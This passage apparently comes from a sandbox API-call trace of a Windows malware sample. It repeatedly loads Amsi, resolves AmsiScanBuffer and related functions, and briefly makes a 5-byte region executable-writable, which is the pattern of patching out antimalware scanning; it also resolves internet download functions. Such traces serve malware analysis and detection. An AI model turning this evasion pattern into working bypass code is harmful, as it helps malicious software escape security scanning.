(hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.838] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.839] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.840] SetErrorMode (uMode=0x8000) returned 0x0 [0100.840] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.849] SetErrorMode (uMode=0x0) returned 0x8000 [0100.849] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.849] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0100.849] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.896] GetCurrentProcess () returned 0xffffffff [0100.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.896] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.896] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.898] VirtualAlloc (lpAddress=0x234c000, dwSize=0x8bd, flAllocationType=0x1000, flProtect=0x4) returned 0x234c000 [0100.898] SetErrorMode (uMode=0x8000) returned 0x0 [0100.898] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.902] SetErrorMode (uMode=0x0) returned 0x8000 [0100.902] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.902] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.903] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.949] GetCurrentProcess () returned 0xffffffff [0100.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.949] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.949] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.951] SetErrorMode (uMode=0x8000) returned 0x0 [0100.951] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.955] SetErrorMode (uMode=0x0) returned 0x8000 [0100.955] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.955] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0100.955] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0101.054] GetCurrentProcess () returned 0xffffffff [0101.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0101.054] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0101.054] FreeLibrary (hLibModule=0x6f870000) returned 1 [0101.056] SetErrorMode (uMode=0x8000) returned 0x0 [0101.056] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0101.061] SetErrorMode (uMode=0x0) returned 0x8000 [0101.061] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0101.061] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0101.061] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0101.116] GetCurrentProcess () returned 0xffffffff [0101.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0101.116] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0101.116] FreeLibrary (hLibModule=0x6f870000) returned 1 [0101.118] SetErrorMode (uMode=0x8000) returned 0x0 [0101.118] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0101.122] SetErrorMode (uMode=0x0) returned 0x8000 [0101.122] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0101.122] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0101.122] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0101.220] GetCurrentProcess () returned 0xffffffff [0101.220] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0101.220] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0101.220] FreeLibrary (hLibModule=0x6f870000) returned 1 [0101.222] SetErrorMode (uMode=0x8000) returned 0x0 [0101.222] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0101.226] SetErrorMode (uMode=0x0) returned 0x8000 [0101.226] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0101.226] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0101.226] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0101.281] GetCurrentProcess () returned 0xffffffff [0101.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0101.282] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0101.282] FreeLibrary (hLibModule=0x6f870000) returned 1 [0101.283] SetErrorMode (uMode=0x8000) returned 0x0 [0101.283] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0101.287] SetErrorMode (uMode=0x0) returned 0x8000 [0101.287] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0101.288] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0101.288] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0101.334] GetCurrentProcess () returned 0xffffffff [0101.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0101.334] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0101.334] FreeLibrary (hLibModule=0x6f870000) returned 1 [0101.336] SetErrorMode (uMode=0x8000) returned 0x0 [0101.336] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0101.340] SetErrorMode (uMode=0x0) returned 0x8000 [0101.340] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0101.340] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0101.340] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0101.406] GetCurrentProcess () returned 0xffffffff [0101.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0101.406] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0101.407] FreeLibrary (hLibModule=0x6f870000) returned 1 [0101.408] SetErrorMode (uMode=0x8000) returned 0x0 [0101.408] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0101.412] SetErrorMode (uMode=0x0) returned 0x8000 [0101.413] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0101.413] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0101.413] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0101.458] GetCurrentProcess () returned 0xffffffff [0101.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0101.458] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0101.458] FreeLibrary (hLibModule=0x6f870000) returned 1 [0101.459] SetErrorMode (uMode=0x8000) returned 0x0 [0101.459] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0101.459] SetErrorMode (uMode=0x0) returned 0x8000 [0101.460] GetProcAddress (hModule=0x76720000, lpProcName="DeleteCriticalSection") returned 0x77220e60 [0101.460] GetProcAddress (hModule=0x76720000, lpProcName="LeaveCriticalSection") returned 0x7720f210 [0101.460] GetProcAddress (hModule=0x76720000, lpProcName="EnterCriticalSection") returned 0x7720f290 [0101.460] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSection") returned 0x7722a200 [0101.460] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0101.461] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0101.461] GetProcAddress (hModule=0x76720000, lpProcName="LocalFree") returned 0x767379a0 [0101.461] GetProcAddress (hModule=0x76720000, lpProcName="LocalAlloc") returned 0x76737a30 [0101.461] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount") returned 0x76745eb0 [0101.461] GetProcAddress (hModule=0x76720000, lpProcName="QueryPerformanceCounter") returned 0x767338a0 [0101.461] GetProcAddress (hModule=0x76720000, lpProcName="GetVersion") returned 0x7673aaf0 [0101.462] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentThreadId") returned 0x76731b90 [0101.462] GetProcAddress (hModule=0x76720000, lpProcName="InterlockedDecrement") returned 0x76742a20 [0101.462] GetProcAddress (hModule=0x76720000, lpProcName="InterlockedIncrement") returned 0x76742a00 [0101.462] GetProcAddress (hModule=0x76720000, lpProcName="VirtualQuery") returned 0x76737a90 [0101.462] GetProcAddress (hModule=0x76720000, lpProcName="WideCharToMultiByte") returned 0x76733880 [0101.463] GetProcAddress (hModule=0x76720000, lpProcName="MultiByteToWideChar") returned 0x76732ad0 [0101.463] GetProcAddress (hModule=0x76720000, lpProcName="lstrlenA") returned 0x76738c80 [0101.463] GetProcAddress (hModule=0x76720000, lpProcName="lstrcpynA") returned 0x7673fe40 [0101.463] GetProcAddress (hModule=0x76720000, lpProcName="LoadLibraryExA") returned 0x7673a270 [0101.463] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadLocale") returned 0x7673af90 [0101.463] GetProcAddress (hModule=0x76720000, lpProcName="GetStartupInfoA") returned 0x76739c10 [0101.464] GetProcAddress (hModule=0x76720000, lpProcName="GetProcAddress") returned 0x767378b0 [0101.464] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleHandleA") returned 0x767399f0 [0101.464] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0101.464] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoA") returned 0x7673e7b0 [0101.464] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0101.464] GetProcAddress (hModule=0x76720000, lpProcName="GetCommandLineA") returned 0x7673ab60 [0101.465] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibrary") returned 0x76739f50 [0101.465] GetProcAddress (hModule=0x76720000, lpProcName="FindFirstFileA") returned 0x76746920 [0101.465] GetProcAddress (hModule=0x76720000, lpProcName="FindClose") returned 0x767468e0 [0101.465] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0101.465] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0101.466] GetProcAddress (hModule=0x76720000, lpProcName="UnhandledExceptionFilter") returned 0x76762670 [0101.466] GetProcAddress (hModule=0x76720000, lpProcName="SetFilePointer") returned 0x76746c40 [0101.466] GetProcAddress (hModule=0x76720000, lpProcName="SetEndOfFile") returned 0x76746c00 [0101.467] GetProcAddress (hModule=0x76720000, lpProcName="RtlUnwind") returned 0x76738c10 [0101.467] GetProcAddress (hModule=0x76720000, lpProcName="ReadFile") returned 0x76746bb0 [0101.467] GetProcAddress (hModule=0x76720000, lpProcName="RaiseException") returned 0x76738c20 [0101.467] GetProcAddress (hModule=0x76720000, lpProcName="GetStdHandle") returned 0x7673a6e0 [0101.467] GetProcAddress (hModule=0x76720000, lpProcName="GetFileSize") returned 0x76746a70 [0101.468] GetProcAddress (hModule=0x76720000, lpProcName="GetFileType") returned 0x76746aa0 [0101.468] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0101.468] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0101.468] SetErrorMode (uMode=0x8000) returned 0x0 [0101.468] LoadLibraryA (lpLibFileName="user32.dll") returned 0x743d0000 [0101.468] SetErrorMode (uMode=0x0) returned 0x8000 [0101.468] GetProcAddress (hModule=0x743d0000, lpProcName="GetKeyboardType") returned 0x7442cd00 [0101.469] GetProcAddress (hModule=0x743d0000, lpProcName="LoadStringA") returned 0x743ffd20 [0101.469] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0101.469] GetProcAddress (hModule=0x743d0000, lpProcName="CharNextA") returned 0x743fe240 [0101.469] SetErrorMode (uMode=0x8000) returned 0x0 [0101.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76600000 [0101.469] SetErrorMode (uMode=0x0) returned 0x8000 [0101.470] GetProcAddress (hModule=0x76600000, lpProcName="RegQueryValueExA") returned 0x7661f500 [0101.470] GetProcAddress (hModule=0x76600000, lpProcName="RegOpenKeyExA") returned 0x7661f790 [0101.470] GetProcAddress (hModule=0x76600000, lpProcName="RegCloseKey") returned 0x7661f620 [0101.470] SetErrorMode (uMode=0x8000) returned 0x0 [0101.470] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76680000 [0101.470] SetErrorMode (uMode=0x0) returned 0x8000 [0101.470] GetProcAddress (hModule=0x76680000, lpProcName="SysFreeString") returned 0x76699d40 [0101.471] GetProcAddress (hModule=0x76680000, lpProcName="SysReAllocStringLen") returned 0x766949e0 [0101.471] GetProcAddress (hModule=0x76680000, lpProcName="SysAllocStringLen") returned 0x76699c00 [0101.471] SetErrorMode (uMode=0x8000) returned 0x0 [0101.471] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0101.471] SetErrorMode (uMode=0x0) returned 0x8000 [0101.471] GetProcAddress (hModule=0x76720000, lpProcName="TlsSetValue") returned 0x767329d0 [0101.471] GetProcAddress (hModule=0x76720000, lpProcName="TlsGetValue") returned 0x76731b70 [0101.472] GetProcAddress (hModule=0x76720000, lpProcName="TlsFree") returned 0x7673a040 [0101.472] GetProcAddress (hModule=0x76720000, lpProcName="TlsAlloc") returned 0x7673a120 [0101.472] GetProcAddress (hModule=0x76720000, lpProcName="LocalFree") returned 0x767379a0 [0101.472] GetProcAddress (hModule=0x76720000, lpProcName="LocalAlloc") returned 0x76737a30 [0101.472] SetErrorMode (uMode=0x8000) returned 0x0 [0101.472] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0101.472] SetErrorMode (uMode=0x0) returned 0x8000 [0101.473] GetProcAddress (hModule=0x76720000, lpProcName="lstrcmpiA") returned 0x76737830 [0101.473] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0101.473] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0101.473] GetProcAddress (hModule=0x76720000, lpProcName="VirtualQuery") returned 0x76737a90 [0101.473] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0101.474] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0101.474] GetProcAddress (hModule=0x76720000, lpProcName="SetFilePointer") returned 0x76746c40 [0101.474] GetProcAddress (hModule=0x76720000, lpProcName="SetEvent") returned 0x767467d0 [0101.474] GetProcAddress (hModule=0x76720000, lpProcName="SetErrorMode") returned 0x76738d20 [0101.474] GetProcAddress (hModule=0x76720000, lpProcName="SetEndOfFile") returned 0x76746c00 [0101.474] GetProcAddress (hModule=0x76720000, lpProcName="ResetEvent") returned 0x767467c0 [0101.475] GetProcAddress (hModule=0x76720000, lpProcName="ReadFile") returned 0x76746bb0 [0101.475] GetProcAddress (hModule=0x76720000, lpProcName="LoadLibraryA") returned 0x76744bf0 [0101.475] GetProcAddress (hModule=0x76720000, lpProcName="LeaveCriticalSection") returned 0x7720f210 [0101.475] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSection") returned 0x7722a200 [0101.475] GetProcAddress (hModule=0x76720000, lpProcName="GetVersionExA") returned 0x7673a700 [0101.476] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadLocale") returned 0x7673af90 [0101.476] GetProcAddress (hModule=0x76720000, lpProcName="GetStringTypeExA") returned 0x7673fe60 [0101.476] GetProcAddress (hModule=0x76720000, lpProcName="GetStdHandle") returned 0x7673a6e0 [0101.476] GetProcAddress (hModule=0x76720000, lpProcName="GetProcAddress") returned 0x767378b0 [0101.476] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleHandleA") returned 0x767399f0 [0101.476] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0101.477] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoA") returned 0x7673e7b0 [0101.477] GetProcAddress (hModule=0x76720000, lpProcName="GetLocalTime") returned 0x76739be0 [0101.477] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0101.477] GetProcAddress (hModule=0x76720000, lpProcName="GetFullPathNameA") returned 0x76746ad0 [0101.477] GetProcAddress (hModule=0x76720000, lpProcName="GetDiskFreeSpaceA") returned 0x767469c0 [0101.477] GetProcAddress (hModule=0x76720000, lpProcName="GetDateFormatA") returned 0x76760de0 [0101.478] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentThreadId") returned 0x76731b90 [0101.478] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcess") returned 0x767338c0 [0101.478] GetProcAddress (hModule=0x76720000, lpProcName="GetCPInfo") returned 0x7673a290 [0101.478] GetProcAddress (hModule=0x76720000, lpProcName="GetACP") returned 0x76738500 [0101.478] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibrary") returned 0x76739f50 [0101.479] GetProcAddress (hModule=0x76720000, lpProcName="FormatMessageA") returned 0x7673f830 [0101.479] GetProcAddress (hModule=0x76720000, lpProcName="FlushInstructionCache") returned 0x76739ae0 [0101.479] GetProcAddress (hModule=0x76720000, lpProcName="EnumCalendarInfoA") returned 0x7673fdf0 [0101.479] GetProcAddress (hModule=0x76720000, lpProcName="EnterCriticalSection") returned 0x7720f290 [0101.479] GetProcAddress (hModule=0x76720000, lpProcName="DeleteCriticalSection") returned 0x77220e60 [0101.480] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0101.480] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventA") returned 0x76746680 [0101.480] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringA") returned 0x7673e1c0 [0101.480] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0101.480] SetErrorMode (uMode=0x8000) returned 0x0 [0101.480] LoadLibraryA (lpLibFileName="user32.dll") returned 0x743d0000 [0101.480] SetErrorMode (uMode=0x0) returned 0x8000 [0101.481] GetProcAddress (hModule=0x743d0000, lpProcName="TranslateMessage") returned 0x743ed9b0 [0101.481] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0101.481] GetProcAddress (hModule=0x743d0000, lpProcName="LoadStringA") returned 0x743ffd20 [0101.481] GetProcAddress (hModule=0x743d0000, lpProcName="GetSystemMetrics") returned 0x743e9160 [0101.481] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageA") returned 0x743fe130 [0101.500] GetProcAddress (hModule=0x743d0000, lpProcName="DispatchMessageA") returned 0x74406f10 [0101.500] GetProcAddress (hModule=0x743d0000, lpProcName="CharNextA") returned 0x743fe240 [0101.500] GetProcAddress (hModule=0x743d0000, lpProcName="CharToOemA") returned 0x74452cf0 [0101.501] GetProcAddress (hModule=0x743d0000, lpProcName="AdjustWindowRect") returned 0x743ff1f0 [0101.501] SetErrorMode (uMode=0x8000) returned 0x0 [0101.501] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0101.501] SetErrorMode (uMode=0x0) returned 0x8000 [0101.501] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0101.501] SetErrorMode (uMode=0x8000) returned 0x0 [0101.501] LoadLibraryA (lpLibFileName="winmm.dll") returned 0x6f8f0000 [0101.501] SetErrorMode (uMode=0x0) returned 0x8000 [0101.502] GetProcAddress (hModule=0x6f8f0000, lpProcName="timeSetEvent") returned 0x6f8f36b0 [0101.502] SetErrorMode (uMode=0x8000) returned 0x0 [0101.502] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x71590000 [0102.075] SetErrorMode (uMode=0x0) returned 0x8000 [0102.075] GetProcAddress (hModule=0x71590000, lpProcName="InternetReadFile") returned 0x71617320 [0102.076] GetProcAddress (hModule=0x71590000, lpProcName="InternetOpenUrlA") returned 0x715da6c0 [0102.076] GetProcAddress (hModule=0x71590000, lpProcName="InternetOpenA") returned 0x716585d0 [0102.076] GetProcAddress (hModule=0x71590000, lpProcName="InternetCloseHandle") returned 0x7165d200 [0102.076] GetProcAddress (hModule=0x71590000, lpProcName="HttpQueryInfoA") returned 0x71631880 [0102.076] SetErrorMode (uMode=0x8000) returned 0x0 [0102.076] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76680000 [0102.077] SetErrorMode (uMode=0x0) returned 0x8000 [0102.077] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayPtrOfIndex") returned 0x76693090 [0102.077] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayGetUBound") returned 0x766925b0 [0102.077] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayGetLBound") returned 0x76692a10 [0102.077] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayCreate") returned 0x766a7dd0 [0102.078] GetProcAddress (hModule=0x76680000, lpProcName="VariantChangeType") returned 0x76697230 [0102.078] GetProcAddress (hModule=0x76680000, lpProcName="VariantCopy") returned 0x766992d0 [0102.078] GetProcAddress (hModule=0x76680000, lpProcName="VariantClear") returned 0x76699570 [0102.078] GetProcAddress (hModule=0x76680000, lpProcName="VariantInit") returned 0x76692590 [0102.078] SetErrorMode (uMode=0x8000) returned 0x0 [0102.078] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0102.078] SetErrorMode (uMode=0x0) returned 0x8000 [0102.079] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0102.079] SetErrorMode (uMode=0x8000) returned 0x0 [0102.079] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0102.079] SetErrorMode (uMode=0x0) returned 0x8000 [0102.079] GetProcAddress (hModule=0x76720000, lpProcName="GetProcAddress") returned 0x767378b0 [0102.079] SetErrorMode (uMode=0x8000) returned 0x0 [0102.079] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.084] SetErrorMode (uMode=0x0) returned 0x8000 [0102.084] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.084] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0102.084] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.131] GetCurrentProcess () returned 0xffffffff [0102.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.131] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.131] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.132] SetErrorMode (uMode=0x8000) returned 0x0 [0102.133] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.137] SetErrorMode (uMode=0x0) returned 0x8000 [0102.137] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.137] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0102.137] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.184] GetCurrentProcess () returned 0xffffffff [0102.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.184] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.184] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.186] SetErrorMode (uMode=0x8000) returned 0x0 [0102.186] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.190] SetErrorMode (uMode=0x0) returned 0x8000 [0102.190] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.190] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0102.190] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.232] GetCurrentProcess () returned 0xffffffff [0102.232] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.232] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.232] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.234] SetErrorMode (uMode=0x8000) returned 0x0 [0102.234] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.237] SetErrorMode (uMode=0x0) returned 0x8000 [0102.238] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.238] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0102.238] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.285] GetCurrentProcess () returned 0xffffffff [0102.285] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.285] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.285] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.287] SetErrorMode (uMode=0x8000) returned 0x0 [0102.287] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.321] SetErrorMode (uMode=0x0) returned 0x8000 [0102.322] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.322] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0102.322] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.398] GetCurrentProcess () returned 0xffffffff [0102.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.399] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.399] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.400] SetErrorMode (uMode=0x8000) returned 0x0 [0102.400] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.404] SetErrorMode (uMode=0x0) returned 0x8000 [0102.404] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.404] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0102.404] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.443] GetCurrentProcess () returned 0xffffffff [0102.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, 